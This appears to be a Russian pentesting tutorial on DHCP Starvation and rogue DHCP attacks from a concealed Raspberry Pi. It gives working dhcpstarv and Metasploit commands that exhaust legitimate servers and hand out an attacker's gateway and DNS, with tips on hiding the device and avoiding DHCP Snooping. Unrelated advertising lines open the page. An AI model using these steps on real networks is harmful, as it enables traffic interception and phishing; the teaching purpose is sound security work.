Атакуем DHCP с помощью Raspberry Pi

Моя цель - предложение широкого ассортимента товаров и услуг на постоянно высоком качестве обслуживания по самым выгодным ценам.

Прежде чем перейти к статье, хочу вам представить, экономическую онлайн игру Brave Knights, в которой вы можете играть и зарабатывать. Регистируйтесь, играйте и зарабатывайте!

На тему атак с использованием протокола DHCP написано достаточно много статей. Атаки DHCP Starvation и поддельный DHCP Сервер являются важными инструментами проведения пентеста.  Однако я предлагаю посмотреть на проблему немного под другим углом. А именно, использовать в качестве аппаратной платформы, с которой будут реализовываться атаки, микрокомпьютер, например Raspberry Pi 3. Благодаря небольшим размерам и возможности работать от аккумулятора это устройство можно незаметно разместить рядом с сетевой розеткой и использовать для реализации атаки.

В этой статье я не буду разбирать процесс установки ОС на Raspberry, на эту тему написано достаточно статей и к тому же там все достаточно просто. Замечу лишь, что дистрибутив Kali Linux, который лучше всего использовать для описываемых атак, есть и для Raspberry Pi.

Чего хотим добиться

Далее мы будем последовательно реализовывать две атаки. Представим, что в тестируемой сети у нас имеется один или несколько DHCP серверов, которые выдают клиентам настройки для IPv4 (можно и IPv6, но в рамках данной статьи мы будем говорить только про четвертую версию протокола). Как мы рассмотрим далее, с помощью DHCP помимо самого IP адреса передаются также маска подсети, серверы DNS и шлюз по умолчанию. Также может передаваться множество других параметров, но опять таки, в рамках данной статьи мы их рассматривать не будем.

Соответственно, нам необходимо будет реализовать две атаки: сначала вывести из строя легальные DHCP серверы, исчерпав все доступные для выдачи адреса, а затем поднять свой DHCP сервер, который будет выдавать нужные настройки. В этих настройках мы можем указать свой шлюз по умолчанию и/или свои DNS серверы. В результате, пользовательский трафик пойдет через узлы, контролируемые злоумышленниками или же пользователи могут оказаться на фишинговых ресурсах. Но обо всем по порядку, начнем с теории работы DHCP. 

Принципы работы DHCP

Протокол динамического присвоения IP-адресов функционирует по принципу DORA:

  • Discover

  • Offer

  • Request

  • Acknowledgment

На первом шаге клиент выполняет широковещательный запрос по всей физической сети с целью обнаружить доступные DHCP-серверы. Он отправляет сообщение типа DHCPDISCOVER (значение опции «Тип сообщения» — 1), при этом в качестве IP-адреса источника указывается 0.0.0.0 (если компьютер ещё не имеет собственного IP-адреса), а в качестве адреса назначения —широковещательный адрес 255.255.255.255. Сообщение DHCPDISCOVER может быть распространено за пределы локальной физической сети при помощи специально настроенных агентов ретрансляции DHCP, перенаправляющих поступающие от клиентов сообщения DHCP серверам в других подсетях. В DHCPDISCOVER обязательно присутствует МАС адрес клиента.

Серверы DHCP отправляет ему на его МАС ответ DHCPOFFER (значение опции «Тип сообщения» — 2), в котором предлагает конфигурацию. Предлагаемый клиенту IP-адрес указывается в поле yiaddr. Прочие параметры (такие, как адреса маршрутизаторов и DNS-серверов) указываются в виде опций в соответствующем поле.

Выбрав одну из конфигураций, предложенных DHCP-серверами, клиент отправляет запрос DHCPREQUEST (значение опции «Тип сообщения» — 3). Он рассылается широковещательно; при этом к опциям, указанным клиентом в сообщении DHCPDISCOVER, добавляется специальная опция — идентификатор сервера — указывающая адрес DHCP-сервера, выбранного клиентом.

Сервер подтверждает запрос и направляет подтверждение DHCPACK (значение опции «Тип сообщения» — 5) клиенту. После этого клиент должен настроить свой сетевой интерфейс, используя предоставленные опции.

В случае, если клиент ранее уже получал IP-адрес и срок его аренды ещё не прошёл — клиент может пропустить стадию DHCPDISCOVER, начав с запроса DHCPREQUEST, отправляемого с идентификатором сервера, который выдал адрес в прошлый раз.

В случае же отсутствия ответа от DHCP-сервера, выдавшего настройки в прошлый раз, клиент отправляет DHCPDISCOVER. Тем самым клиент начинает процесс получения с начала, обращаясь уже ко всем DHCP-серверам в сегменте сети. Это как раз то, что нам нужно.

На этом, полагаю, теории будет достаточно и можно переходить к практике.

Опустошаем DHCP

Узнать IP адрес DHCP сервера можно различными способами: посмотреть в настройках клиента, прослушать трафик, но лучше всего просканировать сеть с помощью сканера Nmap.

sudo nmap -n --script=broadcast-dhcp-discover

В результате работы этого скрипта мы получим список всех найденных DHCP серверов.

Теперь нам понятен масштаб бедствия и можно приступать к атаке DHCP Starvation. Так как мы договорились использовать микрокомпьютеры, то рассматриваться будут только консольные инструменты, потому что их работу можно максимально автоматизировать с помощью скриптов.

В связи с этим мы не будем рассматривать использование утилиты Yersinia для реализации атак DHCP Starvation и запуска поддельного DHCP.  В качестве альтернативы мы рассмотрим утилиту dhcpstarv. Для установки выполним следующие команды:

sudo apt update

sudo apt install dhcpstarv

Для запуска утилиты необходимо только указать используемый интерфейс:

sudo dhcpstarv –i сетевой_интерфейс

После запуска утилита начнет планомерно изымать IP адреса у DHCP серверов.

Как видно, dhcpstarv запрашивает новые IP адреса, подменяя последние три октета в MAC адресе.

Успешным завершением работы утилиты является отсутствие ответов на Discover запросы.

Также, убедиться в исчерпании ресурсов DHCP серверов можно с помощью уже знакомого нам скрипта Nmap:

Rogue DHCP

Теперь мы можем приступить ко второй части – запуску поддельного DHCP сервера, который будет раздавать нужные нам настройки IPv4.

Если у нас используется Kali Linux, то мы можем поднять DHCP с помощью Metasploit.

Для этого запустим консоль:

msfconsole

Далее выполним команду:

use auxiliary/server/dhcp

Прежде чем начинать настройки, посмотрим какие опции нам вообще доступны с помощью:

show options

Нам потребуется указать диапазон адресов, из которого мы затем будем раздавать адреса, маску подсети, широковещательный домен, шлюз по умолчанию, адреса DNS серверов и, собственно, IP адрес самого DHCP сервера.

 Для примера настроим раздачу адресов из подсети 192.168.1.0/24 с DNS 192.168.1.92 и шлюзом 192.168.1.92.

В Metasploit необходимо выполнить следующие команды:

set dhcpipstart 192.168.1.200

set dhcpipend 192.168.1.230

set netmask 255.255.255.0

set broadcast 192.168.1.255

set router 192.168.1.92

set dnsserver 192.168.1.92

set srvhost 192.168.1.92

run

В результате выполнения наш DHCP сервер начнет отвечать на DHCPDISCOVER пакеты и предлагать настройки IPv4. Запуск такого сервера в Metasploit можно автоматизировать, поместив все необходимые команды в текстовый файл с расширением *.rc.

Для запуска автоматического выполнения данных команд необходимо при запуске msfconsole указать этот файл. Например:

msfconsole dhcp.rc

 

Микрокомпьютеры против средств защиты

Я не буду подробно рассматривать работу средств защиты от данных атак. В целом, на портах коммутаторов можно запретить выдачу IP адресов через те порты, за которыми нет и не может быть коммутаторов. Также можно ограничить количество проходящих через порт пакетов. Однако, технология DHCP Snooping работает только для проводных сетей. Таким образом мы моем, во-первых, совмещать использование микрокомпьютеров с атаками на беспроводные сети там где это возможно. А во-вторых, мы можем подключать наши микрокомпьютеры к Ethernet портам в различных помещениях в надежде, что не на всех коммутаторах будет настроен DHCP Snooping. Незаметно разместить маленькое устройство значительно проще, чем сидеть с ноутбуком у всех на виду. 

Заключение

В этой статье мы рассмотрели принципы работы DHCP, основные атаки, которые можно реализовать на данный протокол, а также возможности использования данных атак совместно с микрокомпьютерами.

Еще больше полезной и практической информации мои коллеги из OTUS рассказывают в рамках курсов по информационной безопасности. Заглядывайте в каталог и выбирайте подходящий курс. На страницах курсов вы также можете зарегистрироваться на бесплатные вебинары, которые проходят каждую неделю.

Источник: https://habr.com/ru/companies/otus/articles/758234/


Интересные статьи

Интересные статьи

Привет! Предлагаем немного отвлечься от сложных актуальных тем и поговорить о... шампанском. Точнее, о том, как его совершенствуют с помощью Mashine Learning.Французский производитель шампанских вин B...
Я люблю сталкиваться с трудностями. Но с такими, которые можно решить, подумать над интересным решением, подобрать технологию. Люблю быть в потоке, а после решения чувствую себя настоящим профессионал...
tl;dr: форматы файлов Netpbm позволяют легко выводить пиксели, используя только текстовый ввод-вывод. Вот весь генерирующий это изображение скрипт bash без зависимостей: #!/bi...
Вот бывает же в жизни такое. Сидишь себе не шалишь, никого не трогаешь, починяешь примус, а тут из этого примуса, из телевизора, да и вообще из каждого утюга, до тебя доносится: «нейронные сети, ...
Привет, Хабр! представляю вашему вниманию перевод статьи «Setting up NextCloud and ONLYOFFICE on a single server with Docker». Сложно недооценивать пользу онлайновых пакетов офисных приложений...